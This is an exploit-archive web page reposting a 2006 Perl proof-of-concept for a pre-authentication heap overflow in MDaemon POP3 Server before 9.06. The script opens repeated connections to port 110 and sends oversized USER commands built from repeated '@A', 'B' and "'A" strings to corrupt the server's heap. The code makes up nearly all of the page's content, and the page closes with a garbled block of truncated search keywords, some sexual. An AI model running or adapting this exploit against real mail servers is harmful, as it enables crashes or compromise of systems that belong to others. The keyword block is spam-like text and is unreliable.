about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC




2006-08-22 MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC 
Rated as : Critical

#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
# 
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x < 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110',
Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A" x 160 .
"\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110',
Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A\@A" . "B" x 326
. "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\'A" x  337 .
"\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);
securitydot.net - 2006-08-22

Advertising

Copyright 2007, SecurityDot
Sun, 29 Nov 2009 07:52:16 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.dachix www.Thamil freegonzo. GET /u www.zdcy8. aliciaRFUL doodwali www.wanliw www,com89. Ranisexyph Foto foto news for c sex in you open movie outlook PhpNuke 7. www.myoldw pogo www.cszznt news for c xnx.com jiuaigouwu clipe %2BPHP-Fus down exec Phonerotic WWW.SEXX.C How See Sa Yandex.ru Hawaii Show arab worl image expl saxy girl Www.rulk.c www.chdyx. phpBB por www.tkyxgl jesicaalba www.quangu Easy-Clanp guest book apache 1.3 exploit li avg 7.5 ARAB SEX MyBB 1.1.8 fukinggirl windows se sex videps